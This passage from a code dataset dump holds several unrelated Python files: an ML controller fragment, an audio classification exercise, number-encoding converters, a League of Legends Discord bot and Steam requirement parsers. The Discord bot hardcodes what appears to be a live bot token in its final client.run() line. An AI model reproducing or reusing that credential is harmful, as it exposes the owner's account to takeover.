controller\n controller = Controller(model_path=serialized_info['model_path'],\n dataset_folder=serialized_info['dataset_folder'],\n share_model=serialized_info['share_model'],\n precision=serialized_info['precision'],\n budgets=serialized_info['budgets'],\n trials=serialized_info['trials'],\n budget_optimizer_type=serialized_info['budget_optimizer_type'],\n patience=serialized_info.get('patience', 10),\n max_iter=serialized_info.get('max_iter', 100),\n min_iter=serialized_info.get('min_iter', 20),\n power=POWER)\n\n # Set remaining fields\n controller._thresholds = serialized_info['thresholds']\n controller._avg_level_counts = serialized_info['avg_level_counts']\n controller._is_fitted = serialized_info['is_fitted']\n\n return controller\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--model-paths', type=str, nargs='+')\n parser.add_argument('--dataset-folder', type=str)\n parser.add_argument('--budgets', type=float, nargs='+')\n parser.add_argument('--precision', type=int, required=True)\n parser.add_argument('--trials', type=int, default=3)\n parser.add_argument('--patience', type=int, default=15)\n parser.add_argument('--max-iter', type=int, default=100)\n parser.add_argument('--min-iter', type=int, default=20)\n parser.add_argument('--budget-optimizer', type=str, choices=['coordinate', 'sim-anneal'])\n args = parser.parse_args()\n\n for model_path in args.model_paths:\n print('Starting model at {0}'.format(model_path))\n\n # Create the adaptive model\n controller = Controller(model_path=model_path,\n dataset_folder=args.dataset_folder,\n share_model=False,\n precision=args.precision,\n budgets=args.budgets,\n trials=args.trials,\n power=POWER,\n budget_optimizer_type=args.budget_optimizer,\n patience=args.patience,\n max_iter=args.max_iter,\n min_iter=args.min_iter)\n \n # Fit the model on the validation set\n controller.fit(series=DataSeries.VALID)\n controller.save()\n\n # print('Validation Accuracy: {0:.5f}'.format(controller.score(series=DataSeries.VALID))) \n # print('Test Accuracy: {0:.5f}'.format(controller.score(series=DataSeries.TEST)))\n","sub_path":"src/controllers/logistic_regression_controller.py","file_name":"logistic_regression_controller.py","file_ext":"py","file_size_in_byte":39966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"536255893","text":"import window\nimport sklearn.model_selection\nimport scipy.io.wavfile\nimport numpy as np\n\nimport scipy.fftpack, scipy.signal\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport scipy.io, scipy.io.wavfile, scipy.stats\nimport sklearn.metrics\n\n# possible feature transforms\n# you don't know what these do, but you can try applying them\n# and see how they affect the visualisations\nfeature_fns = {\n \"dct\": lambda x: np.abs(scipy.fftpack.dct(x)),\n \"fft\": lambda x: np.abs(scipy.fftpack.fft(x)),\n \"fft_phase\": lambda x: np.angle(scipy.fftpack.fft(x)),\n \"dct_phase\": lambda x: np.angle(scipy.fftpack.dct(x)),\n \"cepstrum\": lambda x: np.abs(\n scipy.fftpack.ifft(np.log(np.abs(scipy.fftpack.fft(x)) ** 2 + 1e-4))\n )\n ** 2,\n \"raw\": lambda x: x,\n}\n\n# possible windowing functions\nwindow_fns = {\n \"hamming\": scipy.signal.hamming,\n \"hann\": scipy.signal.hann,\n \"boxcar\": scipy.signal.boxcar,\n \"blackmanharris\": scipy.signal.blackmanharris,\n}\n\n\ndef load_wav(fname):\n sr, wave = scipy.io.wavfile.read(fname)\n return wave / 32768.0\n\n\ndef load_features_window(data, size, step, 
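import numpy as np

# A minimal, self-contained sketch of the dict-of-lambdas dispatch used by
# feature_fns above: transforms are looked up by name and applied uniformly,
# so new features plug in at one place (np.fft stands in for scipy.fftpack).
demo_fns = {"raw": lambda x: x, "abs_fft": lambda x: np.abs(np.fft.fft(x))}
x = np.ones(4)
assert demo_fns["abs_fft"](x)[0] == 4.0   # DC bin of an all-ones signal
assert (demo_fns["raw"](x) == x).all()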
window_fn, feature_fn, label, feature_range, decimate):\n\n features = window.window_data(data, size=size, step=step)\n labels = np.full(len(features), label)\n print(f\"Loading into {len(features)} windows of length {size}\")\n\n fn = feature_fns[feature_fn]\n start_range = int(feature_range[0] * features.shape[1])\n end_range = int(feature_range[1] * features.shape[1])\n win = window_fns[window_fn](features.shape[1])\n # apply feature transform and window fn\n X = [fn(feature * win)[start_range:end_range:decimate] for feature in features]\n X = np.array(X)\n return X, labels\n\n\ndef load_data(kwargs):\n X = []\n y = []\n for i in range(5):\n fname = f\"data/challenge_train_{i}.wav\"\n wave_data = load_wav(fname)\n features, labels = load_features_window(\n data=wave_data,\n size=kwargs['size'],\n step=kwargs['step'],\n window_fn=kwargs['window_fn'],\n feature_fn=kwargs['feature_fn'],\n label=i,\n feature_range=kwargs[\"feature_range\"],\n decimate=kwargs[\"decimate\"]\n )\n X.append(features)\n y.append(labels)\n\n X = np.concatenate(X, axis=0)\n y = np.concatenate(y, axis=0)\n print(f\"Using {kwargs['feature_fn']} transform and a {kwargs['window_fn']} window.\") \n return X, y\n\nimport sklearn.neighbors\n\n\ndef knn_fit(X, y):\n knn = sklearn.neighbors.KNeighborsClassifier(n_neighbors=7)\n knn.fit(X=X, y=y)\n return knn\n\n\ndef knn_classify(knn, wave_data, kwargs):\n \n features, _ = load_features_window(\n data=wave_data,\n size=kwargs['size'],\n step=kwargs['step'],\n window_fn=kwargs['window_fn'],\n feature_fn=kwargs['feature_fn'], \n feature_range=kwargs[\"feature_range\"],\n decimate=kwargs[\"decimate\"],\n label=-1)\n \n \n print(\"Predicting...\")\n labels = knn.predict(features)\n return labels\n\ndef load_test_wave_labels(basename):\n # load the data from wavfile\n wave = load_wav(basename + \".wav\")\n labels = np.loadtxt(basename + \".labels\")\n return wave, labels\n\n\ndef plot_test(knn, parameters, fname):\n print(\"=\"*80)\n print(f\"Testing with {fname}\")\n wave, labels_true = load_test_wave_labels(fname)\n labels_pred = knn_classify(knn, wave, parameters)\n plot_test_classification(wave, labels_true, labels_pred)\n\ndef run_secret_test(knn, parameters):\n import secret_test\n classify = lambda wave: knn_classify(knn, wave, parameters)\n secret_test.challenge_evaluate_performance(classify)\n\ndef plot_test_classification(wave_data, labels_true, labels_predicted):\n ## plot the classification of wave_data (should be a 1D 8Khz audio wave)\n ## and two sets of labels: true and predicted. 
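import numpy as np

# window.window_data is imported from a local module; a minimal,
# self-contained sketch of what it presumably does — cut a 1-D signal into
# (possibly overlapping) frames of `size` samples taken every `step` samples.
def demo_window_data(data, size, step):
    starts = range(0, len(data) - size + 1, step)
    return np.array([data[s:s + size] for s in starts])

frames = demo_window_data(np.arange(10), size=4, step=2)
assert frames.shape == (4, 4)
assert frames[1].tolist() == [2, 3, 4, 5]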
They do not need\n ## to be the same length, but they should represent equally-sampled\n ## sections of the wave file\n sr = 4096\n ts = np.arange(len(wave_data)) / float(sr)\n\n try:\n len(labels_true)\n except:\n labels_true = [labels_true]\n\n # make sure there are at least 2 predictions, so interpolation does not freak out\n if len(labels_predicted) == 1:\n labels_predicted = [labels_predicted[0], labels_predicted[0]]\n if len(labels_true) == 1:\n labels_true = [labels_true[0], labels_true[0]]\n\n # predict every 10ms\n frames = ts[::80]\n\n true_inter = scipy.interpolate.interp1d(\n np.linspace(0, np.max(ts), len(labels_true)), labels_true, kind=\"nearest\"\n )\n predicted_inter = scipy.interpolate.interp1d(\n np.linspace(0, np.max(ts), len(labels_predicted)),\n labels_predicted,\n kind=\"nearest\",\n )\n\n true_interpolated = true_inter(frames)[:, None]\n predicted_interpolated = predicted_inter(frames)[:, None]\n # show colorblocks for the labels\n plt.figure(figsize=(16, 4))\n plt.imshow(\n true_interpolated.T,\n extent=[0, np.max(ts), 0, 1],\n interpolation=\"nearest\",\n cmap=\"tab10\",\n vmin=0,\n vmax=10,\n )\n plt.imshow(\n predicted_interpolated.T,\n extent=[0, np.max(ts), 0, -1],\n interpolation=\"nearest\",\n cmap=\"tab10\",\n vmin=0,\n vmax=10,\n )\n\n # plot the wave\n plt.plot(ts, wave_data, c=\"w\", alpha=1)\n plt.text(0.5, 0.5, \"True\", color=\"w\")\n plt.text(0.5, -0.5, \"Predicted\", color=\"w\")\n plt.grid(\"off\")\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Amplitude\") \n\n print(f\"Prediction accuracy {sklearn.metrics.accuracy_score(true_interpolated, predicted_interpolated):.3f}\")\n print(\"Confusion matrix\")\n print(sklearn.metrics.confusion_matrix(true_interpolated, predicted_interpolated))\n print()","sub_path":"Case_study3/audio_task.py","file_name":"audio_task.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"190360683","text":"def b9876543210(valor): #Ok\n dec = int(valor/10)\n uni = valor%10\n if dec > 0:\n resultado = 10*'0' + 10*dec*'0'\n resultado = list(resultado)\n resultado[(-dec*10)-uni-1] = '1'\n resultado = ''.join(resultado)\n else:\n resultado = 10*'0'\n resultado = list(resultado)\n resultado[-uni-1] = '1'\n resultado = ''.join(resultado)\n\n return resultado\n\ndef bcd8642(valor): #Ok\n uni = valor%10\n uni = bin(uni)\n uni = uni[2:]\n dec = int(valor/10)\n\n if dec > 0:\n resultado = bin(dec) + ' ' + uni\n resultado = resultado[2:]\n else:\n resultado = uni\n\n return resultado\n\ndef aiken(valor):\n pass\n\ndef bcd8642v(valor):\n pass\n\ndef ibm(valor): #Ok\n uni = valor%10\n if uni == 0:\n uni = '1010'\n else:\n uni = bin(uni)\n uni = uni[2:]\n dec = int(valor/10)\n\n if dec > 0:\n resultado = bin(dec) + ' ' + uni\n resultado = resultado[2:]\n else:\n resultado = uni\n\n return resultado\n\ndef excesso3(valor): #Ok\n uni = valor%10\n uni = bin(uni)\n uni = bin(int(uni,2)+3)\n\n dec = int(valor/10)\n if dec > 0:\n dec = bin(dec)\n dec = bin(int(dec,2)+3)\n resultado = dec + ' ' + uni[2:]\n resultado = resultado\n else:\n resultado = uni\n\n return resultado[2:]\n\ndef gray(valor): #ok\n#https://www.youtube.com/watch?v=cF-Q5j7RUEw\n bin_ori = bin(valor)\n bin_ori = bin_ori[2:]\n resultado = []\n resultado.append(bin_ori[0])\n for i in range(len(bin_ori)-1):\n if bin_ori[i] == bin_ori[i+1]:\n resultado.append('0')\n else:\n resultado.append('1')\n resultado = ''.join(resultado)\n\n return resultado\n\n\ndef johnson(valor): #Ok\n if valor == 0: 
return '0'\n\n resultado = 50*'0'\n resultado = list(resultado)\n\n if valor <= 50:\n for i in range(valor):\n resultado[-i-1] = '1'\n else:\n dif = valor - 50\n for i in range(50):\n resultado[-i-1] = '1'\n for i in range(dif):\n resultado[-i-1] = '0'\n\n resultado = ''.join(resultado)\n\n return resultado\n\n#print(nome_da_funcao(valor))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"373472699","text":"from discord.ext import commands\nfrom riotwatcher import LolWatcher, ApiError\nfrom analyze_good import ChampionData, ChampionBuild\nfrom datadragontest import Canvas\nimport pandas as pd\nfrom discord import role\nimport discord\nimport os\nimport sys, getopt\n\nclient = commands.Bot(command_prefix=\".\", help_command=None)\nkr = pd.read_csv('KR_DATA.csv')\neuw1 = pd.read_csv('EUW1_DATA.csv')\nna1 = pd.read_csv('NA1_DATA.csv')\nresult = [kr, euw1, na1]\ndf = pd.concat(result)\nVERSION = '11.14.1'\n\nwith open('api_key.txt', 'r') as f:\n key = f.readlines()\n data_watcher = LolWatcher(key)\n\n\nclass Consult:\n def __init__(self, champion_id, role=None):\n self.champion_id = champion_id\n self.role = role\n #\n # def analyze(self):\n\n\nchampions = data_watcher.data_dragon.champions(version=VERSION)['data']\n\nchamp_maps = {\n 266: [\"Aatrox\", \"aatrox\", \"AATROX\", 'atrox', 'atroz'],\n 103: [\"Ahri\", \"ahri\", \"AHRI\", 'ari'],\n 84: [\"Akali\", \"akali\", \"AKALI\", 'akali'],\n 12: [\"Alistar\", \"alistar\", \"ALISTAR\", 'alitar'],\n 32: [\"Amumu\", \"amumu\", \"AMUMU\", 'ammumu', 'amumu'],\n 34: [\"Anivia\", \"anivia\", \"ANIVIA\"],\n 1: [\"Annie\", \"annie\", \"ANNIE\", 'anni', 'ani', 'any', 'anny'],\n 523: [\"Aphelios\", \"aphelios\", \"APHELIOS\", 'afelios', 'apelios', 'ap'],\n 22: [\"Ashe\", \"ashe\", \"ASHE\", 'ache', 'a'],\n 136: [\"AurelionSol\", \"aurelionsol\", \"AURELIONSOL\", 'aurelion', 'sol', 'aurelion sol'],\n 268: [\"Azir\", \"azir\", \"AZIR\", 'asir', 'asur'],\n 432: [\"Bard\", \"bard\", \"BARD\", 'bardo', ],\n 53: [\"Blitzcrank\", \"blitzcrank\", \"BLITZCRANK\", 'blitz', 'blizcrank', 'blitzcrank'],\n 63: [\"Brand\", \"brand\", \"BRAND\", 'bran'],\n 201: [\"Braum\", \"braum\", \"BRAUM\"],\n 51: [\"Caitlyn\", \"caitlyn\", \"CAITLYN\", 'cait', 'caitlin'],\n 164: [\"Camille\", \"camille\", \"CAMILLE\", 'camile'],\n 69: [\"Cassiopeia\", \"cassiopeia\", \"CASSIOPEIA\", 'cassio', 'casio', 'cass', 'cassiopeia'],\n 31: [\"Chogath\", \"chogath\", \"CHOGATH\", 'chogat', 'shogat', \"cho'gath\", \"chogat\", \"cho'gat\"],\n 42: [\"Corki\", \"corki\", \"CORKI\", 'korki', 'corki', 'corqui', 'korki', 'koki'],\n 122: [\"Darius\", \"darius\", \"DARIUS\"],\n 131: [\"Diana\", \"diana\", \"DIANA\"],\n 119: [\"Draven\", \"draven\", \"DRAVEN\", 'draiven', 'draven'],\n 36: [\"DrMundo\", \"drmundo\", \"DRMUNDO\", 'dr mundo', 'mundo', 'dr'],\n 245: [\"Ekko\", \"ekko\", \"EKKO\", 'eko', 'ecco', 'eco', 'ecum'],\n 60: [\"Elise\", \"elise\", \"ELISE\", 'elyse', 'elisse'],\n 28: [\"Evelynn\", \"evelynn\", \"EVELYNN\", 'evelin', 'evelinn', 'eve'],\n 81: [\"Ezreal\", \"ezreal\", \"EZREAL\", 'ez'],\n 9: [\"Fiddlesticks\", \"fiddlesticks\", \"FIDDLESTICKS\", 'fiddle', 'fiddlestics', 'fidlestics', 'fidlesticks', 'fidol'],\n 114: [\"Fiora\", \"fiora\", \"FIORA\"],\n 105: [\"Fizz\", \"fizz\", \"FIZZ\", 'fis', 'fiz'],\n 3: [\"Galio\", \"galio\", \"GALIO\", 'nopelien', 'galo'],\n 41: [\"Gangplank\", \"gangplank\", \"GANGPLANK\", 'gp', 'gankplanc', 'gankplanck', 
'ganplan'],\n 86: [\"Garen\", \"garen\", \"GAREN\"],\n 150: [\"Gnar\", \"gnar\", \"GNAR\", 'nar', 'gnarr'],\n 79: [\"Gragas\", \"gragas\", \"GRAGAS\"],\n 104: [\"Graves\", \"graves\", \"GRAVES\"],\n 887: [\"Gwen\", \"gwen\", \"GWEN\", 'wen', ':v', 'wuen'],\n 120: [\"Hecarim\", \"hecarim\", \"HECARIM\", 'ecarim', 'eca', 'heca', 'jeca'],\n 74: [\"Heimerdinger\", \"heimerdinger\", \"HEIMERDINGER\", 'heimerdinger', 'heimer', 'heimmer', 'heimmendinger'],\n 420: [\"Illaoi\", \"illaoi\", \"ILLAOI\", 'illa', 'iyaoi'],\n 39: [\"Irelia\", \"irelia\", \"IRELIA\"],\n 427: [\"Ivern\", \"ivern\", \"IVERN\"],\n 40: [\"Janna\", \"janna\", \"JANNA\"],\n 59: [\"JarvanIV\", \"jarvaniv\", \"JARVANIV\", 'jarvan', 'jarvis', 'jarvan cuarto', 'jarban'],\n 24: [\"Jax\", \"jax\", \"JAX\", 'jac'],\n 126: [\"Jayce\", \"jayce\", \"JAYCE\", 'jaise', 'jayse'],\n 202: [\"Jhin\", \"jhin\", \"JHIN\", 'jin'],\n 222: [\"Jinx\", \"jinx\", \"JINX\", 'jix', 'jincs'],\n 145: [\"Kaisa\", \"kaisa\", \"KAISA\", \"kai'sa\", 'kai sa'],\n 429: [\"Kalista\", \"kalista\", \"KALISTA\"],\n 43: [\"Karma\", \"karma\", \"KARMA\"],\n 30: [\"Karthus\", \"karthus\", \"KARTHUS\", 'kartus', 'khartus'],\n 38: [\"Kassadin\", \"kassadin\", \"KASSADIN\", 'kasadin'],\n 55: [\"Katarina\", \"katarina\", \"KATARINA\", 'kata', 'cata'],\n 10: [\"Kayle\", \"kayle\", \"KAYLE\", 'kayle'],\n 141: [\"Kayn\", \"kayn\", \"KAYN\"],\n 85: [\"Kennen\", \"kennen\", \"KENNEN\"],\n 121: [\"Khazix\", \"khazix\", \"KHAZIX\", 'k6', 'ksix', 'six', 'khasics', 'kasix'],\n 203: [\"Kindred\", \"kindred\", \"KINDRED\", 'kindre'],\n 240: [\"Kled\", \"kled\", \"KLED\"],\n 96: [\"KogMaw\", \"kogmaw\", \"KOGMAW\", 'kogmau', 'komau', 'kog mau', 'kog'],\n 7: [\"Leblanc\", \"leblanc\", \"LEBLANC\", 'leblanc', 'leb', 'leb blank'],\n 64: [\"LeeSin\", \"leesin\", \"LEESIN\", 'lisin', 'lee', 'lee sin', 'sin'],\n 89: [\"Leona\", \"leona\", \"LEONA\"],\n 876: [\"Lillia\", \"lillia\", \"LILLIA\"],\n 127: [\"Lissandra\", \"lissandra\", \"LISSANDRA\", 'liss', 'lissandra'],\n 236: [\"Lucian\", \"lucian\", \"LUCIAN\"],\n 117: [\"Lulu\", \"lulu\", \"LULU\"],\n 99: [\"Lux\", \"lux\", \"LUX\"],\n 54: [\"Malphite\", \"malphite\", \"MALPHITE\", 'malpite', 'malfite', 'literalphite'],\n 90: [\"Malzahar\", \"malzahar\", \"MALZAHAR\"],\n 57: [\"Maokai\", \"maokai\", \"MAOKAI\"],\n 11: [\"MasterYi\", \"masteryi\", \"MASTERYI\"],\n 21: [\"MissFortune\", \"missfortune\", \"MISSFORTUNE\", 'miss', 'miss fortune', 'fortune'],\n 62: [\"MonkeyKing\", \"monkeyking\", \"MONKEYKING\", 'wukong', 'wu', 'wukong'],\n 82: [\"Mordekaiser\", \"mordekaiser\", \"MORDEKAISER\", 'mordecaiser'],\n 25: [\"Morgana\", \"morgana\", \"MORGANA\"],\n 267: [\"Nami\", \"nami\", \"NAMI\", 'namy'],\n 75: [\"Nasus\", \"nasus\", \"NASUS\"],\n 111: [\"Nautilus\", \"nautilus\", \"NAUTILUS\", 'nauti'],\n 518: [\"Neeko\", \"neeko\", \"NEEKO\", 'nico', 'niko', 'neeko'],\n 76: [\"Nidalee\", \"nidalee\", \"NIDALEE\", 'nidali'],\n 56: [\"Nocturne\", \"nocturne\", \"NOCTURNE\"],\n 20: [\"Nunu\", \"nunu\", \"NUNU\", 'nunu y willump'],\n 2: [\"Olaf\", \"olaf\", \"OLAF\"],\n 61: [\"Orianna\", \"orianna\", \"ORIANNA\"],\n 516: [\"Ornn\", \"ornn\", \"ORNN\"],\n 80: [\"Pantheon\", \"pantheon\", \"PANTHEON\"],\n 78: [\"Poppy\", \"poppy\", \"POPPY\"],\n 555: [\"Pyke\", \"pyke\", \"PYKE\"],\n 246: [\"Qiyana\", \"qiyana\", \"QIYANA\"],\n 133: [\"Quinn\", \"quinn\", \"QUINN\"],\n 497: [\"Rakan\", \"rakan\", \"RAKAN\"],\n 33: [\"Rammus\", \"rammus\", \"RAMMUS\", 'ramus'],\n 421: [\"RekSai\", \"reksai\", \"REKSAI\", 'rek sai', 'rek', 'sai'],\n 526: [\"Rell\", 
\"rell\", \"RELL\", 'rel'],\n 58: [\"Renekton\", \"renekton\", \"RENEKTON\", 'renek'],\n 107: [\"Rengar\", \"rengar\", \"RENGAR\"],\n 92: [\"Riven\", \"riven\", \"RIVEN\"],\n 68: [\"Rumble\", \"rumble\", \"RUMBLE\"],\n 13: [\"Ryze\", \"ryze\", \"RYZE\"],\n 360: [\"Samira\", \"samira\", \"SAMIRA\"],\n 113: [\"Sejuani\", \"sejuani\", \"SEJUANI\"],\n 235: [\"Senna\", \"senna\", \"SENNA\"],\n 147: [\"Seraphine\", \"seraphine\", \"SERAPHINE\"],\n 875: [\"Sett\", \"sett\", \"SETT\"],\n 35: [\"Shaco\", \"shaco\", \"SHACO\"],\n 98: [\"Shen\", \"shen\", \"SHEN\"],\n 102: [\"Shyvana\", \"shyvana\", \"SHYVANA\", 'shivana'],\n 27: [\"Singed\", \"singed\", \"SINGED\"],\n 14: [\"Sion\", \"sion\", \"SION\"],\n 15: [\"Sivir\", \"sivir\", \"SIVIR\"],\n 72: [\"Skarner\", \"skarner\", \"SKARNER\"],\n 37: [\"Sona\", \"sona\", \"SONA\"],\n 16: [\"Soraka\", \"soraka\", \"SORAKA\"],\n 50: [\"Swain\", \"swain\", \"SWAIN\"],\n 517: [\"Sylas\", \"sylas\", \"SYLAS\"],\n 134: [\"Syndra\", \"syndra\", \"SYNDRA\"],\n 223: [\"TahmKench\", \"tahmkench\", \"TAHMKENCH\", 'kench', 'kenc', 'quench', 'tham', 'tahm'],\n 163: [\"Taliyah\", \"taliyah\", \"TALIYAH\"],\n 91: [\"Talon\", \"talon\", \"TALON\"],\n 44: [\"Taric\", \"taric\", \"TARIC\"],\n 17: [\"Teemo\", \"teemo\", \"TEEMO\"],\n 412: [\"Thresh\", \"thresh\", \"THRESH\"],\n 18: [\"Tristana\", \"tristana\", \"TRISTANA\"],\n 48: [\"Trundle\", \"trundle\", \"TRUNDLE\"],\n 23: [\"Tryndamere\", \"tryndamere\", \"TRYNDAMERE\"],\n 4: [\"TwistedFate\", \"twistedfate\", \"TWISTEDFATE\"],\n 29: [\"Twitch\", \"twitch\", \"TWITCH\"],\n 77: [\"Udyr\", \"udyr\", \"UDYR\"],\n 6: [\"Urgot\", \"urgot\", \"URGOT\"],\n 110: [\"Varus\", \"varus\", \"VARUS\"],\n 67: [\"Vayne\", \"vayne\", \"VAYNE\"],\n 45: [\"Veigar\", \"veigar\", \"VEIGAR\"],\n 161: [\"Velkoz\", \"velkoz\", \"VELKOZ\", 'vel'],\n 254: [\"Vi\", \"vi\", \"VI\"],\n 234: [\"Viego\", \"viego\", \"VIEGO\"],\n 112: [\"Viktor\", \"viktor\", \"VIKTOR\"],\n 8: [\"Vladimir\", \"vladimir\", \"VLADIMIR\"],\n 106: [\"Volibear\", \"volibear\", \"VOLIBEAR\"],\n 19: [\"Warwick\", \"warwick\", \"WARWICK\"],\n 498: [\"Xayah\", \"xayah\", \"XAYAH\"],\n 101: [\"Xerath\", \"xerath\", \"XERATH\"],\n 5: [\"XinZhao\", \"xinzhao\", \"XINZHAO\"],\n 157: [\"Yasuo\", \"yasuo\", \"YASUO\"],\n 777: [\"Yone\", \"yone\", \"YONE\"],\n 83: [\"Yorick\", \"yorick\", \"YORICK\"],\n 350: [\"Yuumi\", \"yuumi\", \"YUUMI\"],\n 154: [\"Zac\", \"zac\", \"ZAC\"],\n 238: [\"Zed\", \"zed\", \"ZED\"],\n 115: [\"Ziggs\", \"ziggs\", \"ZIGGS\"],\n 26: [\"Zilean\", \"zilean\", \"ZILEAN\"],\n 142: [\"Zoe\", \"zoe\", \"ZOE\"],\n 143: [\"Zyra\", \"zyra\", \"ZYRA\"],\n 'TOP': ['top', 'toplane'],\n 'MIDDLE': ['mid', 'middle'],\n 'JUNGLE': ['jg', 'jungle', 'selva', 'jungla'],\n 'UTILITY': ['sup', 'supp', 'support', 'soporte'],\n 'BOTTOM': ['adc', 'adcarry', 'carry'],\n}\nrole_map = {\n 'TOP': ['top', 'toplane'],\n 'MIDDLE': ['mid', 'middle'],\n 'JUNGLE': ['jg', 'jungle', 'selva', 'jungla'],\n 'UTILITY': ['sup', 'supp', 'support', 'soporte'],\n 'BOTTOM': ['adc', 'adcarry', 'carry'],\n}\n\n\n@client.event\nasync def on_ready():\n print('bot ready')\n\n\nclass Consult:\n def __init__(self, champion, role=None):\n self.champion = champion\n self.role = role\n matches = ChampionData(df)\n champion_matches = matches.champion_data(self.champion, self.role)\n champion = ChampionBuild(champion_matches)\n self.mythic, self.core, self.final, self.starter, self.boots, self.primary_runes, self.secondary_runes, self.spell1, self.spell2, self.champion_name = champion.get_all_data()\n\n def 
make_all_info(self):\n if self.role is None:\n image = Canvas(self.mythic, self.core, self.final, self.primary_runes, self.secondary_runes, self.champion,\n self.starter, self.boots, self.spell1, self.spell2)\n image.make_image()\n else:\n image = Canvas(self.mythic, self.core, self.final, self.primary_runes, self.secondary_runes, self.champion,\n self.starter, self.boots, self.spell1, self.spell2)\n image.make_image(self.role)\n\n\ndef check_img(champion, rol=None):\n if rol is None:\n file = 'all_info/popular_' + str(champion) + \".png\"\n if os.path.isfile(file):\n return file\n else:\n kayn = Consult(champion)\n kayn.make_all_info()\n return file\n\n else:\n file = 'all_info/popular_' + str(champion) + '_' + rol + \".png\"\n if os.path.isfile(file):\n return file\n else:\n kindred = Consult(champion, rol)\n kindred.make_all_info()\n return file\n\n\n@client.command(aliases=['allinfo', 'AllInfo'])\nasync def ai(ctx, champion, aux=None, aux1=None):\n # this if aux is None, then this is only the champ, with popular role\n champion = champion.lower()\n if aux is None:\n for value in champ_maps.values():\n if champion in value:\n champion = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n\n file = check_img(champion, aux)\n await ctx.send(file=discord.File(file))\n break\n print(champion)\n # there are 3 possible options\n # 1. aux is role, then aux1 is None and this means one word champ and its role\n # 2. aux is second word of champ, and aux1 is none, then is a 2 word champs with popular role\n # 3. aux is second word champ and aux1 is its role, thus is a 2 word champ with is specific role\n elif aux is not None and aux1 is None: # this means either opcion 1 or 2\n aux = aux.lower()\n\n for value in champ_maps.values():\n if aux in value:\n aux = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n\n if aux in role_map.keys():\n # thi means that is option 1\n for value in champ_maps.values():\n if champion in value:\n champion = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n break\n file = check_img(champion, aux)\n await ctx.send(file=discord.File(file))\n elif type(aux) is int:\n # this means that is option 2\n file = check_img(aux)\n await ctx.send(file=discord.File(file))\n print(champion)\n\n if aux is not None and aux1 is not None:\n # this means option 3, thus we will\n\n print('option3')\n for value in champ_maps.values():\n if champion in value:\n champion = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n break\n\n for value in champ_maps.values():\n if aux in value:\n aux = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n\n for value in champ_maps.values():\n if aux1 in value:\n aux1 = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n if type(champion) is int and aux1 in role_map.keys():\n print('make consult with champion and aux1')\n file = check_img(champion, aux1)\n print(file)\n await ctx.send(file=discord.File(file))\n elif type(aux) is int and aux1 in role_map.keys():\n print('make consult with aux and aux1')\n file = check_img(aux, aux1)\n await ctx.send(file=discord.File(file))\n\n\nclient.run('ODQ3NDQ3ODQxMjM2MzIwMjU3.YK-NTg.8tuP_8K9qmRmC9kelmZ-Qiqwg2Y')\n","sub_path":"discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":13528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"163166466","text":"import re\n\n\ndef game_genre_category(game_data):\n\t\"\"\"\n\t\tArgs:\n\t\t\tgame_data: 
Scraped steam game data as dictionary\n\t\tReturn:\n\t\t\tAll game genres and categories.\n\t\"\"\"\n\ttry:\n\t\tgenres = game_data['genres']\n\texcept KeyError:\n\t\tgenres = []\n\n\ttry:\n\t\tcategories = game_data['categories']\n\texcept KeyError:\n\t\tcategories = []\n\n\tgame_themes = genres + categories\n\tif game_themes:\n\t\tget_themes = [theme['description'] for theme in game_themes]\n\t\tjoin_themes = ', '.join(get_themes)\n\t\treturn join_themes\n\treturn ''\n\n\ndef steam_minimum_requirements(raw_requirement):\n\t\"\"\"\n\t\tclean steam game minimum requirements\n\t\"\"\"\n\ttry:\n\t\traw_min = raw_requirement.replace('\\n', '').replace('\\t', '')\n\t\tfind_min = re.findall(\"OS:(.*?)\", raw_min)\n\t\tif not find_min:\n\t\t\tfind_min = re.findall(\"OS(.*?)\", raw_min)\n\t\t\tif not find_min:\n\t\t\t\tfind_min = re.findall(':(.*?)', raw_min + '')\n\t\trequirements = '  • OS:' + find_min[0] + \"\"\n\n\t\treturn requirements\n\n\texcept:\n\t\traw_min = raw_requirement.replace('\\n', '').replace('\\t', '')\n\t\tfind_min = re.findall('', raw_min)\n\t\treplace_min = '    ' + find_min[0].replace(' class=\"bb_ul\">', '') + ''\n\t\trequirements = replace_min\n\n\t\treturn requirements\n\n\ndef steam_max_requirements(raw_requirement):\n\t\"\"\"\n\t\tclean steam game maximum requirements\n\t\"\"\"\n\ttry:\n\t\traw_max = raw_requirement.replace('\\n', '').replace('\\t', '') + ''\n\t\tfind_max = re.findall(\"OS:(.*?)\", raw_max)\n\t\tif not find_max:\n\t\t\tfind_max = re.findall(\"OS(.*?)\", raw_max)\n\t\t\tif not find_max:\n\t\t\t\tfind_max = re.findall(':(.*?)', raw_max + '')\n\t\tmax_req = '  • OS:' + find_max[0] + \"\"\n\n\t\treturn max_req\n\n\texcept:\n\t\traw_max = raw_requirement.replace('\\n', '').replace('\\t', '') + ''\n\t\tfind_max = re.findall('', raw_max)\n\t\treplace_max = '